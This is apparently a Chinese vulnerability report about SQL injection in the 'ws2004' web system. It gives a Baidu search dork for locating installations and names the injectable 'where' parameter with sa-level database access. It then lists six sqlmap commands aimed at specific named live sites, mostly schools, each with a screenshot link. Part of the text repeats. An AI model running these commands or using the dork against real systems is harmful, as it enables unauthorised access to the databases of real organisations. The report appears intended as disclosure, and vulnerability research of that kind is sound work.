### 简要描述: ... ### 详细说明: 百度dork:inurl:/ws2004/ 技术支持:南京苏亚星资讯科技开发有限公司 ---------------------------------------- 漏洞页面:ws2004/SysManage/LeaveWord/List.asp?AbPage=1&where=%20where%20Title%20like%20111 漏洞参数:where 均为sa权限 ---------------------------------------- 漏洞证明: 1# http://www.suyaxing.com:81/ws2004/ ``` C:\Users\Administrator>sqlmap.py -u "http://www.suyaxing.com:81/ws2004/SysManage/LeaveWord /List.asp?AbPage=1&where=%20where%20Title%20like%20111*" --current-db --current- user ``` [<img src="https://images.seebug.org/upload/201501/062145230b740b54cb24410a2b6406a5eddf09a0.jpg" alt="QQ图片20150106214435.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/062145230b740b54cb24410a2b6406a5eddf09a0.jpg) 2# http://sgtjb.com/ws2004/ ``` C:\Users\Administrator>sqlmap.py -u "http://sgtjb.com/ws2004/SysManage/LeaveWord /List.asp?AbPage=1&where=%20where%20Title%20like%20111*" --current-db --current- user ``` [<img...
### 简要描述: ... ### 详细说明: 百度dork:inurl:/ws2004/ 技术支持:南京苏亚星资讯科技开发有限公司 ---------------------------------------- 漏洞页面:ws2004/SysManage/LeaveWord/List.asp?AbPage=1&where=%20where%20Title%20like%20111 漏洞参数:where 均为sa权限 ---------------------------------------- 漏洞证明: 1# http://www.suyaxing.com:81/ws2004/ ``` C:\Users\Administrator>sqlmap.py -u "http://www.suyaxing.com:81/ws2004/SysManage/LeaveWord /List.asp?AbPage=1&where=%20where%20Title%20like%20111*" --current-db --current- user ``` [<img src="https://images.seebug.org/upload/201501/062145230b740b54cb24410a2b6406a5eddf09a0.jpg" alt="QQ图片20150106214435.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/062145230b740b54cb24410a2b6406a5eddf09a0.jpg) 2# http://sgtjb.com/ws2004/ ``` C:\Users\Administrator>sqlmap.py -u "http://sgtjb.com/ws2004/SysManage/LeaveWord /List.asp?AbPage=1&where=%20where%20Title%20like%20111*" --current-db --current- user ``` [<img src="https://images.seebug.org/upload/201501/06214639df8be08c8568be30d7c4d8019f1e14a2.jpg" alt="QQ图片20150106214632.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/06214639df8be08c8568be30d7c4d8019f1e14a2.jpg) 3# http://www.sdjnzx.com/ws2004/ ``` C:\Users\Administrator>sqlmap.py -u "http://www.sdjnzx.com/ws2004/SysManage/Leav eWord/List.asp?AbPage=1&where=%20where%20Title%20like%20111*" --current-db --cu rrent-user ``` [<img src="https://images.seebug.org/upload/201501/06214741fb7770c81e8e2f1767e6d8afad6e174e.jpg" alt="QQ图片20150106214734.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/06214741fb7770c81e8e2f1767e6d8afad6e174e.jpg) 4# http://www.wuai.lwedu.sh.cn/ws2004/ ``` C:\Users\Administrator>sqlmap.py -u "http://www.wuai.lwedu.sh.cn/ws2004/SysManag e/LeaveWord/List.asp?AbPage=1&where=%20where%20Title%20like%20111*" --current-db --current-user ``` [<img src="https://images.seebug.org/upload/201501/06214847f54beceaa3b9aa778274d493d0f78bea.jpg" alt="QQ图片20150106214840.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/06214847f54beceaa3b9aa778274d493d0f78bea.jpg) 5# http://www.yzsx.net.cn/ws2004/ ``` C:\Users\Administrator>sqlmap.py -u "http://www.yzsx.net.cn/ws2004/SysManage/Lea veWord/List.asp?AbPage=1&where=%20where%20Title%20like%20111*" --current-user -- current-db ``` [<img src="https://images.seebug.org/upload/201501/06215039df6dd7132bdadaf01b6ddd12de5941c1.jpg" alt="QQ图片20150106215032.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/06215039df6dd7132bdadaf01b6ddd12de5941c1.jpg) 6# http://www.cgyz.net.cn//ws2004/ ``` C:\Users\Administrator>sqlmap.py -u "http://www.cgyz.net.cn//ws2004/SysManage/Le aveWord/List.asp?AbPage=1&where=%20where%20Title%20like%20111*" --current-db --c urrent-user ``` [<img src="https://images.seebug.org/upload/201501/06215157dba042801217453fb257576f8d2a9c48.jpg" alt="QQ图片20150106215151.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/06215157dba042801217453fb257576f8d2a9c48.jpg) ### 漏洞证明: